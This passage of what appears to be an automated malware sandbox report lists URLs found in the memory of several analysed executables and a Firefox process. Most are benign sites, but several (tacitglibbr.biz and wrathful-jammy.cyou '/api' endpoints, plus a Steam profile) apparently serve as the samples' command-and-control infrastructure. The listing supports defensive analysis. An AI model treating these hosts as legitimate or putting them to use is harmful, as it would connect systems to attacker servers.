Source: c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.00000000015DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000002.2789383376.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000768000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
Source: c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626791918.00000000016EB000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591548096.000000000164B000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000762000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreem
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: firefox.exe, 00000020.00000003.3222273184.000001D7652E2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3254686843.000001D7652E2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3357985948.000001D76C088000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 00000020.00000003.3225530259.000001D7645F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: firefox.exe, 00000020.00000003.3357033075.000001D76C167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000020.00000003.2979743205.000001D7661AC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2940691017.000001D7661AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 00000020.00000003.3357033075.000001D76C167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: 232a1df2aa.exe, 0000000E.00000003.2899681691.0000000005DBD000.00000004.00000020.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3193860810.0000000000C35000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: 232a1df2aa.exe, 0000000E.00000002.3193860810.0000000000C35000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: 232a1df2aa.exe, 0000000E.00000003.2899681691.0000000005DBD000.00000004.00000020.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3193860810.0000000000C35000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 232a1df2aa.exe, 0000000E.00000002.3193860810.0000000000C35000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: c1ca3b12e5.exe, 0000000D.00000002.2788804989.000000000157E000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2931893504.000000000072B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz/api
Source: c1ca3b12e5.exe, 0000000F.00000003.2908148719.000000000078B000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2860806346.0000000000799000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz/osc
Source: c1ca3b12e5.exe, 0000000F.00000003.2861700918.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz:443/apiS
Source: firefox.exe, 00000020.00000003.2971960415.000001D76AEBA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3030121788.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3053530552.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3017814440.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2999525313.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3277426988.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3007306068.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3131674080.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 00000020.00000003.3222273184.000001D7652F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3073852793.000001D76C566000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000020.00000003.3091128668.000001D7665DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 00000020.00000003.3073620068.000001D76C56E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3088335348.000001D7667EF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3204896563.000001D76C56E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: firefox.exe, 00000020.00000003.2971960415.000001D76AEBA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3030121788.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3053530552.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3017814440.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2999525313.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3277426988.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3007306068.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3131674080.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: c1ca3b12e5.exe, 0000000F.00000002.2932914771.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wrathful-jammy.cyou/
Source: c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000002.2789383376.00000000015F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wrathful-jammy.cyou/9
Source: H9TU4oY.exe, 00000007.00000003.2592162489.0000000001673000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626586599.0000000001674000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908148719.000000000078B000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wrathful-jammy.cyou/api
Source: H9TU4oY.exe, 00000007.00000003.2592162489.0000000001673000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626586599.0000000001674000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wrathful-jammy.cyou/apiK
Source: H9TU4oY.exe, 00000007.00000003.2592162489.0000000001673000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626586599.0000000001674000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wrathful-jammy.cyou/eg
Source: c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000768000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wrathful-jammy.cyou:443/api
Source: firefox.exe, 00000020.00000003.3073852793.000001D76C566000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000020.00000003.3073852793.000001D76C566000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 00000020.00000003.3073620068.000001D76C56E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3002936663.000001D763AF5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3204896563.000001D76C56E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 00000020.00000003.3222273184.000001D7652F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3073852793.000001D76C566000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.00000000019AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 00000020.00000003.2836334530.000001D762B3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2836706840.000001D762B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2835893600.000001D762900000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000020.00000003.3357985948.000001D76C05E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3073852793.000001D76C566000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 00000020.00000003.3073852793.000001D76C566000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 00000020.00000003.3073620068.000001D76C56E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3002936663.000001D763AF5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3204896563.000001D76C56E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 00000020.00000003.3073852793.000001D76C566000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 00000020.00000003.3073620068.000001D76C56E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3204896563.000001D76C56E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bbc.co.uk/
Source: firefox.exe, 00000020.00000003.3073852793.000001D76C566000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 00000020.00000003.3073852793.000001D76C566000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.co.uk/
Source: firefox.exe, 00000020.00000003.3073852793.000001D76C566000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.de/
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.00000000019AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: firefox.exe, 00000020.00000003.3088335348.000001D7667F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3088335348.000001D7667EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: firefox.exe, 00000020.00000003.3215646339.000001D76B00F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 00000020.00000003.2930963703.000001D76B1D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000020.00000003.2836334530.000001D762B3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2836706840.000001D762B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2835893600.000001D762900000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: firefox.exe, 00000020.00000003.3222273184.000001D7652F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: firefox.exe, 00000020.00000003.3073620068.000001D76C56E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3002936663.000001D763AF5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3204896563.000001D76C56E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 00000020.00000003.3073620068.000001D76C56E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3204896563.000001D76C56E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 00000020.00000003.3073620068.000001D76C56E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3002936663.000001D763AF5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3204896563.000001D76C56E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: 232a1df2aa.exe, 0000000E.00000002.3193860810.0000000000C04000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: firefox.exe, 00000020.00000003.3357033075.000001D76C167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: 232a1df2aa.exe, 0000000E.00000002.3193860810.0000000000C04000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: firefox.exe, 00000020.00000003.3357985948.000001D76C05E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/anything/?
Source: 232a1df2aa.exe, 0000000E.00000002.3193860810.0000000000CE7000.00000040.00000001.01000000.0000000D.sdmp, 232a1df2aa.exe, 0000000E.00000002.3193860810.0000000000C04000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: 232a1df2aa.exe, 0000000E.00000002.3193860810.0000000000CE7000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/W1sYnpxLnB3ZA==
Source: firefox.exe, 00000020.00000003.3357033075.000001D76C167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: 232a1df2aa.exe, 0000000E.00000002.3193860810.0000000000C04000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: 232a1df2aa.exe, 0000000E.00000003.3077138700.000000000C143000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3357033075.000001D76C167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: firefox.exe, 00000020.00000003.3357033075.000001D76C167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000020.00000003.3357985948.000001D76C088000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-mod
Source: 232a1df2aa.exe, 0000000E.00000002.3193860810.0000000000C04000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: 232a1df2aa.exe, 0000000E.00000003.3077138700.000000000C143000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3357033075.000001D76C167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 232a1df2aa.exe, 0000000E.00000002.3193860810.0000000000C04000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: firefox.exe, 00000020.00000003.3088335348.000001D7667EF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3073852793.000001D76C566000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 00000020.00000003.3222273184.000001D7652F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3073852793.000001D76C566000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3204896563.000001D76C56E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000020.00000003.3323492995.000001D76C4BB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3331519614.000001D76C464000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3320833254.000001D76C4BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.tiktok.com/
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: firefox.exe, 00000020.00000003.3073852793.000001D76C566000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: firefox.exe, 00000020.00000003.3222273184.000001D7652F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3073852793.000001D76C566000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000020.00000003.3088335348.000001D7667EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 00000020.00000003.3093022677.000001D7662CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3085023959.000001D76AF4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com
